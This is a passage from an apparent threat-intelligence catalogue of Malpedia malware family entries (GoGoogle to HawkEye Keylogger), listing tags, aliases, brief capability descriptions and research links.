GoGoogle is also known as:

BossiTossi

Table 1896. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle
https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/

GoldenEye

The tag is: misp-galaxy:malpedia="GoldenEye"

GoldenEye is also known as:

Petya/Mischa

Table 1897. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye
https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/
https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/

GoldenHelper

The tag is: misp-galaxy:malpedia="GoldenHelper"

GoldenHelper is also known as:

Table 1898. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/

GoldenSpy

The tag is: misp-galaxy:malpedia="GoldenSpy"

GoldenSpy is also known as:

Table 1899. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy
https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf
https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/
https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf
https://www.ic3.gov/media/news/2020/200728.pdf
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/
https://www.ic3.gov/Media/News/2020/201103-1.pdf

GoldMax

Gold Max is a Golang written command and control backdoor used by the NOBELIUM threat actor group. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running.

The tag is: misp-galaxy:malpedia="GoldMax"

GoldMax is also known as:

SUNSHUTTLE

Table 1900. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax
https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

GoldDragon

GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.

The malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server.

The tag is: misp-galaxy:malpedia="GoldDragon"

GoldDragon is also known as:

Lovexxx

Table 1901. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon
https://www.youtube.com/watch?v=rfzmHjZX70s
https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf

Golroted

The tag is: misp-galaxy:malpedia="Golroted"

Golroted is also known as:

Table 1902. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted
http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html

Gomorrah stealer

The tag is: misp-galaxy:malpedia="Gomorrah stealer"

Gomorrah stealer is also known as:

Table 1903. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer
https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April

Goodor

The tag is: misp-galaxy:malpedia="Goodor"

Goodor is also known as:

Fuerboos

Table 1904. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks
https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/
https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control

GoogleDrive RAT

The tag is: misp-galaxy:malpedia="GoogleDrive RAT"

GoogleDrive RAT is also known as:

Table 1905. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat
https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf

GooPic Drooper

The tag is: misp-galaxy:malpedia="GooPic Drooper"

GooPic Drooper is also known as:

Table 1906. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic
https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/

GootKit

Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.

The tag is: misp-galaxy:malpedia="GootKit"

GootKit is also known as:

Waldek
Xswkit
talalpek

Table 1907. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit
https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/
https://dannyquist.github.io/gootkit-reversing-ghidra/
https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/
http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html
http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html
https://www.certego.net/en/news/malware-tales-gootkit/
https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728
https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/
https://securelist.com/gootkit-the-cautious-trojan/102731/
https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html
https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html
https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md
https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps
https://www.youtube.com/watch?v=242Tn0IL2jE
https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/
https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection
https://news.drweb.com/show/?i=4338&lng=en
https://www.youtube.com/watch?v=QgUlPvEE4aw
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/
https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan
http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/
https://twitter.com/MsftSecIntel/status/1366542130731094021
https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/
https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/
https://www.us-cert.gov/ncas/alerts/TA16-336A
https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055

Gophe

The tag is: misp-galaxy:malpedia="Gophe"

Gophe is also known as:

Table 1908. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe
https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques
https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville

GOTROJ

The tag is: misp-galaxy:malpedia="GOTROJ"

GOTROJ is also known as:

Table 1909. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gotroj
https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf

GovRAT

The tag is: misp-galaxy:malpedia="GovRAT"

GovRAT is also known as:

Table 1910. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat
https://www.yumpu.com/en/document/view/55930175/govrat-v20

Gozi

2000 Ursnif aka Snifula 2006 Gozi v1.0, Gozi CRM, CRM, Papras 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*) → 2010 Gozi Prinimalka → Vawtrak/Neverquest

In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.

In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.

The tag is: misp-galaxy:malpedia="Gozi"

Gozi is also known as:

CRM
Gozi CRM
Papras
Snifula
Ursnif

Table 1911. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
https://securelist.com/financial-cyberthreats-in-2020/101638/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.secureworks.com/research/threat-profiles/gold-swathmore
https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007
https://www.secureworks.com/research/gozi
http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html
https://github.com/mlodic/ursnif_beacon_decryptor
https://lokalhost.pl/gozi_tree.txt
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/
https://www.youtube.com/watch?v=BcFbkjUVc7o
https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/

GPCode

The tag is: misp-galaxy:malpedia="GPCode"

GPCode is also known as:

Table 1912. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode
http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html
http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/
https://de.securelist.com/analysis/59479/erpresser/
https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2

GrabBot

The tag is: misp-galaxy:malpedia="GrabBot"

GrabBot is also known as:

Table 1913. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot
http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data

Graftor

The tag is: misp-galaxy:malpedia="Graftor"

Graftor is also known as:

Table 1914. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor
http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html

Grandoreiro

According to ESET Research, Grandoreirois a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.

The tag is: misp-galaxy:malpedia="Grandoreiro"

Grandoreiro is also known as:

Table 1915. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro
https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/
https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://securelist.com/the-tetrade-brazilian-banking-malware/97779/
https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks
https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf
http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853

GrandSteal

The tag is: misp-galaxy:malpedia="GrandSteal"

GrandSteal is also known as:

Table 1916. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grandsteal
http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html

Grateful POS

POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. Masked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.

The tag is: misp-galaxy:malpedia="Grateful POS"

Grateful POS is also known as:

FrameworkPOS
SCRAPMINT
trinity

Table 1917. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season
https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/
https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf
https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/
https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf
http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html
http://www.secureworks.com/research/threat-profiles/gold-franklin

Gratem

The tag is: misp-galaxy:malpedia="Gratem"

Gratem is also known as:

Table 1918. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem

Gravity RAT

The tag is: misp-galaxy:malpedia="Gravity RAT"

Gravity RAT is also known as:

Table 1919. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
https://securelist.com/gravityrat-the-spy-returns/99097/
https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/
https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

GREASE

The tag is: misp-galaxy:malpedia="GREASE"

GREASE is also known as:

Table 1920. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grease
https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

GreenShaitan

The tag is: misp-galaxy:malpedia="GreenShaitan"

GreenShaitan is also known as:

eoehttp

Table 1921. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan
https://blog.cylance.com/spear-a-threat-actor-resurfaces

GreyEnergy

The tag is: misp-galaxy:malpedia="GreyEnergy"

GreyEnergy is also known as:

Table 1922. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy
https://www.eset.com/int/greyenergy-exposed/
https://www.secureworks.com/research/threat-profiles/iron-viking
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf
https://securelist.com/greyenergys-overlap-with-zebrocy/89506/
https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/
https://github.com/NozomiNetworks/greyenergy-unpacker

GRILLMARK

This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system’s proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.

The tag is: misp-galaxy:malpedia="GRILLMARK"

GRILLMARK is also known as:

Hellsing Backdoor

Table 1923. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark
https://content.fireeye.com/m-trends/rpt-m-trends-2019
https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/

GRIMAGENT

GRIMAGENT is a backdoor that can execute arbitrary commands, download files, create and delete scheduled tasks, and execute programs via scheduled tasks or via the ShellExecute API. The malware persists via a randomly named scheduled task and a registry Run key. The backdoor communicates to hard-coded C&C servers via HTTP requests with portions of its network communications encrypted using both asymmetric and symmetric cryptography. GRIMAGENT was used during some Ryuk Ransomware intrusions in 2020.

The tag is: misp-galaxy:malpedia="GRIMAGENT"

GRIMAGENT is also known as:

Table 1924. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent
https://twitter.com/bryceabdo/status/1352359414746009608
https://blog.group-ib.com/grimagent
https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets
https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

GROK

The tag is: misp-galaxy:malpedia="GROK"

GROK is also known as:

Table 1925. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grok

GRUNT

The tag is: misp-galaxy:malpedia="GRUNT"

GRUNT is also known as:

Table 1926. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt
https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/
https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html
https://twitter.com/ItsReallyNick/status/1208141697282117633

gsecdump

The tag is: misp-galaxy:malpedia="gsecdump"

gsecdump is also known as:

Table 1927. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump
https://attack.mitre.org/wiki/Technique/T1003

GUP Proxy Tool

The tag is: misp-galaxy:malpedia="GUP Proxy Tool"

GUP Proxy Tool is also known as:

Table 1928. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy
https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks

H1N1 Loader

The tag is: misp-galaxy:malpedia="H1N1 Loader"

H1N1 Loader is also known as:

Table 1929. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1
https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

HabitsRAT (Windows)

The tag is: misp-galaxy:malpedia="HabitsRAT (Windows)"

HabitsRAT (Windows) is also known as:

Table 1930. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat
https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/
https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers

Hacksfase

The tag is: misp-galaxy:malpedia="Hacksfase"

Hacksfase is also known as:

Table 1931. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

HackSpy

Py2Exe based tool as found on github.

The tag is: misp-galaxy:malpedia="HackSpy"

HackSpy is also known as:

Table 1932. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy
https://github.com/ratty3697/HackSpy-Trojan-Exploit

Hades

Ransomware.

The tag is: misp-galaxy:malpedia="Hades"

Hades is also known as:

Table 1933. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hades
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure
http://www.secureworks.com/research/threat-profiles/gold-winter
https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/
https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/
https://www.accenture.com/us-en/blogs/security/ransomware-hades
https://twitter.com/inversecos/status/1381477874046169089?s=20
https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/
https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware

Hakbit

Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server. The ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.

Contact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent "KiraLock" has kiraransom@ (among others of course).

The tag is: misp-galaxy:malpedia="Hakbit"

Hakbit is also known as:

Thanos Ransomware

Table 1934. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit
https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4
http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland
https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/
https://unit42.paloaltonetworks.com/thanos-ransomware/
https://securelist.com/cis-ransomware/104452/
https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf
https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/
https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/
https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/
https://unit42.paloaltonetworks.com/prometheus-ransomware/

Hamweq

The tag is: misp-galaxy:malpedia="Hamweq"

Hamweq is also known as:

Table 1935. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq
https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/
https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf
https://www.youtube.com/watch?v=JPvcLLYR0tE
https://www.youtube.com/watch?v=FAFuSO9oAl0

Hancitor

Hancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.

The tag is: misp-galaxy:malpedia="Hancitor"

Hancitor is also known as:

Chanitor

Table 1936. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor
https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/
https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/
https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/
https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure
https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/
https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8
https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear
https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/
https://pid4.io/posts/how_to_write_a_hancitor_extractor/
https://www.uperesia.com/hancitor-packer-demystified
https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/
https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618
https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon
https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/
https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/
https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor
https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/
https://blog.group-ib.com/prometheus-tds
https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html
https://isc.sans.edu/diary/rss/27618
https://twitter.com/TheDFIRReport/status/1359669513520873473
https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html
https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak
https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/
https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader
https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/
https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/
https://blog.group-ib.com/hancitor-cuba-ransomware
https://cyber-anubis.github.io/malware%20analysis/hancitor/

HappyLocker (HiddenTear?)

The tag is: misp-galaxy:malpedia="HappyLocker (HiddenTear?)"

HappyLocker (HiddenTear?) is also known as:

Table 1937. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker

HARDRAIN (Windows)

The tag is: misp-galaxy:malpedia="HARDRAIN (Windows)"

HARDRAIN (Windows) is also known as:

Table 1938. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf

Harnig

The tag is: misp-galaxy:malpedia="Harnig"

Harnig is also known as:

Piptea

Table 1939. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig
https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html
https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html

Haron Ransomware

The tag is: misp-galaxy:malpedia="Haron Ransomware"

Haron Ransomware is also known as:

Table 1940. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.haron
https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/
https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b

Havex RAT

Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as "Dragonfly" and "Energetic Bear". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.

Once installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.

Havex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.

The tag is: misp-galaxy:malpedia="Havex RAT"

Havex RAT is also known as:

Table 1941. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat
https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://www.secureworks.com/research/threat-profiles/iron-liberty
https://www.f-secure.com/weblog/archives/00002718.html

HAWKBALL

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

The tag is: misp-galaxy:malpedia="HAWKBALL"

HAWKBALL is also known as:

Table 1942. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball
https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

HawkEye Keylogger

HawKeye is a keylogger that is distributed since 2013. Discovered by IBM X-Force, it is currently spread over phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new "loader capabilities" have been spotted. It is sold by its development team on dark web markets and hacking forums.

The tag is: misp-galaxy:malpedia="HawkEye Keylogger"

HawkEye Keylogger is also known as:

HawkEye
HawkEye Reborn
Predator Pain

Table 1943. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger
https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/
